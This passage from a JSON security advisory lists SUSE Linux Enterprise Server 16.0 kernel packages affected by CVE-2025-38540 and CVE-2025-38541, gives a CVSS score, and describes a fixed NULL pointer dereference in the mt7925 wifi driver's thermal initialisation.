"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38540"
},
{
"cve": "CVE-2025-38541",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38541"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7925: Fix null-ptr-deref in mt7925_thermal_init()\n\ndevm_kasprintf() returns NULL on error. Currently, mt7925_thermal_init()\ndoes not check for this case, which results in a NULL pointer\ndereference.\n\nAdd NULL check after devm_kasprintf() to prevent this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
